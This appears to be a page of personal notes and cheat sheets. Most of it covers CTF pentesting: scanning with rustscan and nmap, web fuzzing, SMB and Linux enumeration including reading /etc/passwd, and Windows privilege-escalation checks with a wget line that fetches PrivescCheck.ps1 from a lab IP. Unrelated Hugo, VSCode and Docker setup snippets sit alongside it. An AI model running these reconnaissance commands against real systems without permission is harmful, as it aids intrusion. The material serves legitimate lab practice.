Notes

Quick guide for pentest CTFs like Boot2Roots. Methodology: identify problem(s), gather info, analyze clues, test/iterate/repeat, and avoid common mistakes. Wikis HackTricks AppSecExplained Red Team Notes Blogs Overgrowncarrot1 Enumerate Open ports? rustscan, nmap. Running services? Version numbers? Operating System (Linux/Windows)? Domains? /etc/hosts Webserver (Apache/Ngnix)? Subdomins? DNS nslookup $domain dig -query=ANY $domain Common Files robots.txt sitemap.xml .htaccess security.txt manifest.json browserconfig.xml etc PrivEsc sudo -l curl ^ Thanks for reading

rustscan rustscan -a $ip -g rustscan -a $ip -p $ports -- -sC -sV | tee scan.init nmap nmap -vv -Pn $ip nmap -vv -Pn -p $ports -A $ip feroxbuster feroxbuster -u http://$ipa -w $wordlist | tee fuzz.init FFUF ffuf -u http://$ip/FUZZ -w $wordlist | tee fuzz.init firefox Analysis: Whatruns, Wappalyzer /robots.txt, sitemap(.xml) smb enum4linux $ipa | tee enum4.txt # smb shares Linux Enumeration ls -la /home cat /etc/passwd cat /etc/crontab sudo -l # run sudo with?...

Full Supported Languages List Alias(es) Here’s what I use for my urls: url: hugo alias: # aliases for multiple - post/hugo - But in order for aliases to work, I have to change aslias to asliases, save. Then change it back to aslias. Strange. Markdown All in One Hands down the best extension to use within VSCode is Markdown All in One. Paste links over text for automatic linking Continues ordered and unordered lists when typing Working Checkbox Items Add the below snippet to footer e....

whoami /priv whoami /all gci -recurse . gci -recurse -hidden . Manual Enum - C:\Users - C:\ - C:\Windows\Temp Auto Enum - Winpeas - PrivesCheck (https://github.com/itm4n/PrivescCheck) - . .\PrivescCheck.ps1; Invoke-PrivescCheck Transfer - wget http://$ip/ -UseBasicParsing -OutFile $file.ext wget http://10.4.59.208:8000/PrivescCheck.ps1 -UseBasicParsing -OutFile PrivescCheck.ps1``` --- Thanks for reading

Installing Docker. Bash script: #!/bin/bash # Update, install and enable Docker sudo apt update -y && sudo apt upgrade -y sudo apt install -y docker.io sudo systemctl enable docker --now # Add current use into docker group sudo usermod -aG docker $USER # Pull latest Rustscan docker pull rustscan/rustscan:latest # Create a ZSH Aliases File touch ~/.zsh_aliases # Add it to ZSH RC echo """if [ -f ~/.zsh_aliases ]; then ....